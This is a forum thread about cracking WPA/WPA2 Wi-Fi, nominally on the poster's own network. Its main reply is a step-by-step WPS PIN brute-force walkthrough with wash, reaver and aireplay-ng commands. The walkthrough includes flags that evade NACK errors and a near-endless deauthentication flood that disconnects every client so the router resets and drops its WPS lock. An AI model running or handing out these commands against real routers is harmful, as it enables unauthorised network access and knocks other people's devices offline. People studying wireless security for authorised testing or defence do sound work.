WPA/WPA2 hacking

Hi! I’m new to ethical hacking. I’m using kali linux to hack my own wifi network. I failed in dictionary attack, WPS attack. Can anyone help me with this.

1 Like

I do not know the answer but I would like to follow this thread, since I’m a beginner myself too and wanted to start with that too.

I have bought a second router for it, you? What’s your set-up?

Ever tried Airgeddon?

-Gaining Access - WPA & WPA2 Cracking - Exploiting WPS:

Reaver:
run wash command to get all WPS enabled routers within range:
wash -i wlan0
Then run next command against the target:

reaver --bssid 11:22:33:44:55:66 --channel 11 -i wlan0
(bssid)

When you get the message: failed to associate with 11:22:33:44:55:66,
Now run airodump-ng and tell not to associate with this bssid because we going to do this manualy.
Split the screen and give the command:

aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0
(mac target) (own mac)

Then go back to the first terminal and run command:

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A

run this commaand and go to the next terminal and run the deauth attack again.
Now it tries to bruteforce the pin.

In case reaver still don’t give any information after this, run the same command but add -vvv (verbose) to produce verbose output so it gives as much information as possible about what’s happening in the background.

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv

Run both commands again:

(reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv)

(aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0)

(in split screen) Run it a littlebit, then ctrl C both terminals to stop and analyze the output.
You can see that reaver is re-trying the same pin again and again and WPS transaction failed after sending the NACK packets.
Then you an look for help by doing: reaver --help to see the options. Scrolling down you see the option -N or --no-nacks. This option tells reaver not to send NACK messages when out of order packets are recieved.
Now, run the same commands again and add the option --no-nacks:

aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv --no-nacks

Now you see that reaver will not try the same pin again but all the time a different pin without any errors.

-WPS lock: (If the pin is set manually, not the factory settings)
Run wash command: wash -i wlan0
Then run reaver:
reaver -b 00:11:22:33:44:55 -c 11 -i wlan0
Now reaver is trying all possible combinations of the pin. Can take a long time. Even hours.
Some routers will lock WPS after trying to crack the pin a couple of times. Most routers do not. But if a router gets locked you have to wait 'till the router unlocks. Sometimes it takes a minute or hours, but sometimes it can take days before a router unlocks.
With a locked router, reaver will stop working. If you do ctrl C and run wash again, you can see that WPS is locked on the router. The simpelest way to solve that problem is to deauth all the devices on the target so they will think there is something wrong with the router and then restart the router again:
aireplay-ng --deauth 1000000000000000000000 -a 00:11:22:33:44:55 wlan0
(long number to deauth a long time)
After the target reconnects again, start reaver again.

1 Like

what does this mean? what login page?
can you explain your steps how you capture remote wifi password?

Ha! I’m sorry! I didn’t check this post.
This is a copy paste from a text I wrote before and the ettercap part is a mistake. I’m sorry for that!
I replaced it with the right text.

Little bit of a late reaction from me, but your information is very helpful! Thanks for sharing!